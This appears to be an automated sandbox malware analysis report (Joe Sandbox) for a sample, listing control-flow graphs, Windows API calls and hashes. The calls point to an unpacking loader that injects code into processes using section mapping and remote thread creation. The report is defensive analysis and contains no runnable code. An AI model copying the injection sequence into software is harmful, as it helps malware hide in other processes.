                                                                                                                                                                • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                                                                • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                                                • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 374 402f97-402fbb 375 402fc1-402fd9 374->375 376 4030ee-4030f3 374->376 375->376 377 402fdf-402ff0 375->377 378 402ff2-402ffb 377->378 379 403000-40300e 378->379 379->379 380 403010-403017 379->380 381 403039-403040 380->381 382 403019-403038 380->382 383 403062-403065 381->383 384 403042-403061 381->384 382->381 385 403067-40306a 383->385 386 40306e 383->386 384->383 385->386 387 40306c 385->387 386->378 388 403070-403075 386->388 387->388 388->376 389 403077-40307a 388->389 389->376 390 40307c-4030eb RtlCreateUserThread NtTerminateProcess 389->390 390->376
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1921587553-0
                                                                                                                                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 391 79273a-792753 392 792755-792757 391->392 393 792759 392->393 394 79275e-79276a CreateToolhelp32Snapshot 392->394 393->394 395 79277a-792787 Module32First 394->395 396 79276c-792772 394->396 397 792789-79278a call 7923f9 395->397 398 792790-792798 395->398 396->395 401 792774-792778 396->401 402 79278f 397->402 401->392 401->395 402->398
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00792762
                                                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 00792782
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078F000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_78f000_OCYe9qcxiM.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                • Instruction ID: 21dfb931feb32b98a10bef07665f1585c9260cbc2e2af594c4ea6864fea1566c
                                                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                • Instruction Fuzzy Hash: BAF06235500714BBEB203AF9B88DB6AB6ECAF49724F100528E746E11C1DA78E8464A61

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 71 216003c-2160047 72 216004c-2160263 call 2160a3f call 2160e0f call 2160d90 VirtualAlloc 71->72 73 2160049 71->73 88 2160265-2160289 call 2160a69 72->88 89 216028b-2160292 72->89 73->72 93 21602ce-21603c2 VirtualProtect call 2160cce call 2160ce7 88->93 91 21602a1-21602b0 89->91 92 21602b2-21602cc 91->92 91->93 92->91 100 21603d1-21603e0 93->100 101 21603e2-2160437 call 2160ce7 100->101 102 2160439-21604b8 VirtualFree 100->102 101->100 104 21605f4-21605fe 102->104 105 21604be-21604cd 102->105 106 2160604-216060d 104->106 107 216077f-2160789 104->107 109 21604d3-21604dd 105->109 106->107 110 2160613-2160637 106->110 113 21607a6-21607b0 107->113 114 216078b-21607a3 107->114 109->104 112 21604e3-2160505 109->112 117 216063e-2160648 110->117 121 2160517-2160520 112->121 122 2160507-2160515 112->122 115 21607b6-21607cb 113->115 116 216086e-21608be LoadLibraryA 113->116 114->113 119 21607d2-21607d5 115->119 126 21608c7-21608f9 116->126 117->107 120 216064e-216065a 117->120 123 21607d7-21607e0 119->123 124 2160824-2160833 119->124 120->107 125 2160660-216066a 120->125 129 2160526-2160547 121->129 122->129 130 21607e4-2160822 123->130 131 21607e2 123->131 133 2160839-216083c 124->133 132 216067a-2160689 125->132 127 2160902-216091d 126->127 128 21608fb-2160901 126->128 128->127 134 216054d-2160550 129->134 130->119 131->124 135 2160750-216077a 132->135 136 216068f-21606b2 132->136 133->116 137 216083e-2160847 133->137 139 2160556-216056b 134->139 140 21605e0-21605ef 134->140 135->117 141 21606b4-21606ed 136->141 142 21606ef-21606fc 136->142 143 216084b-216086c 137->143 144 2160849 137->144 145 216056f-216057a 139->145 146 216056d 139->146 140->109 141->142 147 21606fe-2160748 142->147 148 216074b 142->148 143->133 144->116 149 216057c-2160599 145->149 150 216059b-21605bb 145->150 146->140 147->148 148->132 155 21605bd-21605db 149->155 150->155 155->134
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0216024D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2160000_OCYe9qcxiM.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                • Instruction ID: b5ed4fde32294e7aa38a0e3cc414e3c7c438f795dd78e2fb808d139c398ac453
                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                • Instruction Fuzzy Hash: 82526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA95CF14

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 373 418940-418a80 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00514D70), ref: 00418A1F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418A5C
                                                                                                                                                                • VirtualProtect.KERNELBASE(00514BB4,00514D6C,00000040,?), ref: 00418A7B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-3916222277
                                                                                                                                                                • Opcode ID: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
                                                                                                                                                                • Instruction ID: 50ffa957652d6c793d686c1d0a186ca9e6a8cd8bf043fc734a0081a481964278
                                                                                                                                                                • Opcode Fuzzy Hash: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
                                                                                                                                                                • Instruction Fuzzy Hash: B4312918518680CAEB01DB78FC057923B66AB75709F04E1B8D14C8B7B1D7BB051E9B6A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 404 2160e0f-2160e24 SetErrorMode * 2 405 2160e26 404->405 406 2160e2b-2160e2c 404->406 405->406
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02160223,?,?), ref: 02160E19
                                                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02160223,?,?), ref: 02160E1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2160000_OCYe9qcxiM.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                • Instruction ID: e9c0ddff7ad8c06008852dff5cd4673f15b5d7d0f17db3ceebe3952d7cf3b5ad
                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                • Instruction Fuzzy Hash: 53D0123154512877D7002AD4DC0DBDD7B1CDF09B66F108011FB0DD9080C770954046E5

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 407 4018e6-40194b call 401193 Sleep call 40141f 421 40195a-4019a5 call 401193 407->421 422 40194d-401955 call 401514 407->422 422->421
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                                                • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                                                                • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                                                • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 436 401915-401918 437 4018c6-4018c7 436->437 438 40191a-40194b call 401193 Sleep call 40141f 436->438 439 4018d7 437->439 440 4018ce-4018e3 call 401193 437->440 450 40195a-4019a5 call 401193 438->450 451 40194d-401955 call 401514 438->451 439->440 451->450
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                                                • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                                                                • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                                                • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 465 4018f1-40194b call 401193 Sleep call 40141f 475 40195a-4019a5 call 401193 465->475 476 40194d-401955 call 401514 465->476 476->475
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                                                • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                                                                • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                                                • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 490 401912-40194b call 401193 Sleep call 40141f 501 40195a-4019a5 call 401193 490->501 502 40194d-401955 call 401514 490->502 502->501
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                                                • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                                                                • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                                                • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0079244A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078F000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_78f000_OCYe9qcxiM.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                • Instruction ID: 67ab49b15a43d2636405130e0a9947d3d1c36f0e506a76c19434085e327be286
                                                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                • Instruction Fuzzy Hash: D2113C79A00208FFDB01DF98C985E98BBF5AF08350F158094F9489B362D775EA50DF80
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                                                • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                                                                • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                                                • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                                                                                                APIs
                                                                                                                                                                • LocalAlloc.KERNELBASE(00000000,00514D6C,00418FA2), ref: 00418918
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocLocal
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3494564517-0
                                                                                                                                                                • Opcode ID: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                                                                • Instruction ID: 452ad643668a9869e20cf026667031a7807d1b47aa2963159c3e27e96442b96b
                                                                                                                                                                • Opcode Fuzzy Hash: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                                                                • Instruction Fuzzy Hash: F0B012B094A2009FDB00CF90FC44B903BB4F358702F00D061F500C1160D7304404EF16
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2160000_OCYe9qcxiM.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: .$GetProcAddress.$l
                                                                                                                                                                • API String ID: 0-2784972518
                                                                                                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                • Instruction ID: 9d09f4bf71310db208545c88e6d1876d258cb477de8417cdf57686ef8e2b68ec
                                                                                                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                • Instruction Fuzzy Hash: C33168B6900609CFDB10CF99C884BAEBBFAFF08324F15414AD845A7310D7B1EA55CBA4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078F000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_78f000_OCYe9qcxiM.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                • Instruction ID: 52b550a6fe06e297e6414a7b6fa7b4c6f09a102240cad841e670b81355821738
                                                                                                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                • Instruction Fuzzy Hash: 6F116572740100AFDB54DF59ECC1FA673EAEB89320B298155ED05CB356E67AEC42C760
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2160000_OCYe9qcxiM.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                • Instruction ID: 8aefb2e03bfe832e8c935329caa654c986fc1f0a6ad12d7bc440d1f32141431e
                                                                                                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                • Instruction Fuzzy Hash: 0001F272A506008FDF21CF64C808BBE33E5FB8A206F1541A8D90B97281E370A851CB80
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2828c34342f3815c3a081a3e232e5bf3c7d5b66456e8337138159d3dab8dfd4a
                                                                                                                                                                • Instruction ID: b9232dddd9ee29daca17cdcb62ceace461c000e746484e610e32f03e96d1e91f
                                                                                                                                                                • Opcode Fuzzy Hash: 2828c34342f3815c3a081a3e232e5bf3c7d5b66456e8337138159d3dab8dfd4a
                                                                                                                                                                • Instruction Fuzzy Hash: 43F0A46010D6819BD70A4F295849A32AE5C6F1635773400FF8483751C3D23D9B06A25F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 63b4c3a10474be77627dd7ffc6b477ca949237bb5390a61aa1a28c39769f84d6
                                                                                                                                                                • Instruction ID: d1b8e31bddeb2f7b6042b6099c65d61f305dd5db917431d595f2b01c6c23c79b
                                                                                                                                                                • Opcode Fuzzy Hash: 63b4c3a10474be77627dd7ffc6b477ca949237bb5390a61aa1a28c39769f84d6
                                                                                                                                                                • Instruction Fuzzy Hash: 2AF0286051D6829FDB064F246849622AF5C7B17367B2800FFD082751C2D23D4703524F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: cae2540cb9c86968295ecba8107e2f6a9a5581a42c82d6f017583cd200ad5459
                                                                                                                                                                • Instruction ID: cd2a5714165b29a814f6ac358bf4ae572c67f0cbec0d0585c5c9e05d2ef64f4e
                                                                                                                                                                • Opcode Fuzzy Hash: cae2540cb9c86968295ecba8107e2f6a9a5581a42c82d6f017583cd200ad5459
                                                                                                                                                                • Instruction Fuzzy Hash: F7F0246051C6429BDB0A4F20A849B22BE9C6A05327B2800FF94827A2C6D27D5707624F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 17a9bbcbe20a561799d741479fe956cd9d64513df161fe16a55e3be2a286ad20
                                                                                                                                                                • Instruction ID: 841a20fc3ad8dda8eaf68fd6d7690e010f869272b20976cef6142a2bb287e419
                                                                                                                                                                • Opcode Fuzzy Hash: 17a9bbcbe20a561799d741479fe956cd9d64513df161fe16a55e3be2a286ad20
                                                                                                                                                                • Instruction Fuzzy Hash: 95F059A000C281DBCB095F246849A32AE9C6F0631BB3800FFC483B91C3D13E9B07A24F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9e5e6fc283191548cf4b126092c7b085b7b2bf72b55aa16d0ab73a897bcf3586
                                                                                                                                                                • Instruction ID: cca6bdd2ccee7e980bcbfdfdf0824053d034a4cd0fab719316bdbfef4302d11e
                                                                                                                                                                • Opcode Fuzzy Hash: 9e5e6fc283191548cf4b126092c7b085b7b2bf72b55aa16d0ab73a897bcf3586
                                                                                                                                                                • Instruction Fuzzy Hash: 2BF05C6140C2418BDB154F106D896227F8CAB0671BB2400FF8442791C3E13D4706934F
